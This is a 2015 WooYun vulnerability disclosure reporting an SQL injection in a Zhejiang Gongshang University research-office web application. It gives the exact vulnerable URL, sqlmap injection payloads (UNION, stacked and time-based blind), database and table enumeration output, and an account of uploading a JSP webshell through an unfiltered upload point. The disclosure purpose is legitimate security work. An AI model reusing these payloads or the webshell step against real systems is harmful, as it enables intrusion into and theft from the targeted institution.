当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092377

漏洞标题: 浙江工商大学某站点SQL注入已shell

相关厂商:浙江工商大学

漏洞作者: Ton7BrEak

提交时间:2015-01-19 14:16

修复时间:2015-01-24 14:18

公开时间:2015-01-24 14:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-19: 细节已通知厂商并且等待厂商处理中
2015-01-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

浙江工商大学某站点SQL注入#01

详细说明:

001x注入点
http://kyc.zjgsu.edu.cn/kyc_new/notify.do?ActionMethod=view&id=1543

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ActionMethod=view&id=1543' AND 6962=6962 AND 'tdtU'='tdtU
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: ActionMethod=view&id=-2556' UNION ALL SELECT 28,CHAR(58) CHAR(118) CHAR(118) CHAR(110)
CHAR(58) CHAR(112) CHAR(104) CHAR(110) CHAR(102) CHAR(122) CHAR(76) CHAR(90) CHAR(69) CHAR(101) CHAR
(104) CHAR(58) CHAR(97) CHAR(109) CHAR(110) CHAR(58),28,28--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ActionMethod=view&id=1543'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ActionMethod=view&id=1543' WAITFOR DELAY '0:0:5'--
---
[10:30:07] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[10:30:07] [INFO] fetching database names
[10:30:07] [INFO] the SQL query used returns 7 entries
[10:30:07] [INFO] resumed: "kyc"
[10:30:07] [INFO] resumed: "master"
[10:30:07] [INFO] resumed: "model"
[10:30:07] [INFO] resumed: "msdb"
[10:30:07] [INFO] resumed: "Northwind"
[10:30:07] [INFO] resumed: "pubs"
[10:30:07] [INFO] resumed: "tempdb"
available databases [7]:
[*] kyc
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


002x跑出的数据库,下一步看权限

001.jpg


003x当前数据库的所有表

Database: kyc
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| dbo.[Work] | 9471 |
| dbo.oldwork | 6563 |
| dbo.ProjectPoints | 3385 |
| dbo.Journal | 1831 |
| dbo.Journal_temp | 1824 |
| dbo.GroupUser | 1629 |
| dbo.newTable1 | 1545 |
| dbo.RegUser | 1545 |
| dbo.OutlayDetail | 1345 |
| dbo.pointshz | 1295 |
| dbo.notify | 1209 |
| dbo.Outlay | 1091 |
| dbo.Award | 592 |
| dbo.[??] | 290 |
| dbo.news | 257 |
| dbo.Communication | 252 |
| dbo.TypePoints | 113 |
| dbo.priv | 82 |
| dbo.func | 51 |
| dbo.College | 46 |
| dbo.Department | 46 |
| dbo.document | 43 |
| dbo.sort | 39 |
| dbo.fff | 38 |
| dbo.RankTypeObj | 33 |
| dbo.Tables | 29 |
| dbo.AwardTypeObj | 25 |
| dbo.OrderTypeObj | 22 |
| dbo.pbcatedt | 21 |
| dbo.kill_kk | 20 |
| dbo.pbcatfmt | 20 |
| dbo.PrjSource | 20 |
| dbo.sere | 20 |
| dbo.PrjRank | 19 |
| dbo.WorkMember | 15 |
| dbo.zlmb_tr | 15 |
| dbo.orgs | 14 |
| dbo.SignTypeObj | 12 |
| dbo.manager | 10 |
| dbo.download | 9 |
| dbo.kyjhhyh | 9 |
| dbo.WcTypeObj | 9 |
| dbo.AwardSignTypeObj | 6 |
| dbo.IndexTypeObj | 6 |
| dbo.PrjAwdRatio | 6 |
| dbo.ProductionType | 6 |
| dbo.stuff | 6 |
| dbo.sysconstraints | 6 |
| dbo.BookWcTypeObj | 5 |
| dbo.glgz | 5 |
| dbo.status | 5 |
| dbo.UserGroup | 5 |
| dbo.[level] | 3 |
| dbo.dlmb_tr | 3 |
| dbo.syssegments | 3 |
| dbo.harvest | 2 |
| dbo.prjlevel | 2 |
| dbo.project | 2 |
| dbo.D99_REG | 1 |
| dbo.depart_z | 1 |
| dbo.guizu | 1 |
| dbo.kycxcl | 1 |
+----------------------+---------+


004x找后台,找管理员密码并进入后台
http://kyc.zjgsu.edu.cn/kyc_new/login.do

漏洞证明:

001x疑似之前已经被侵入过

002.jpg


002x上传点,直接上传jsp菜刀马,未做任何过滤

001.jpg


002.jpg


修复方案:

防sql注入,上传服务端验证

版权声明:转载请注明来源 Ton7BrEak@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-24 14:18

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-19 23:27 | xq17 ( 路人 | Rank:14 漏洞数:3 | xq17小菜鸟来向大神学习了)

    求交流

  2. 2015-01-20 10:46 | Ton7BrEak ( 普通白帽子 | Rank:211 漏洞数:43 | 吃苦耐劳,我只会第一个!)

    @xq17 同是小菜鸟一枚~

  3. 2015-05-12 15:05 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    @Ton7BrEak 三个漏洞112分,大神啊!!!

  4. 2015-05-12 15:08 | Ton7BrEak ( 普通白帽子 | Rank:211 漏洞数:43 | 吃苦耐劳,我只会第一个!)

    @明月影 后来漏洞被忽略的多··我都匿名发布了~准备不被忽略的就设置成非匿名,后来就懒得管了~以后都匿名吧~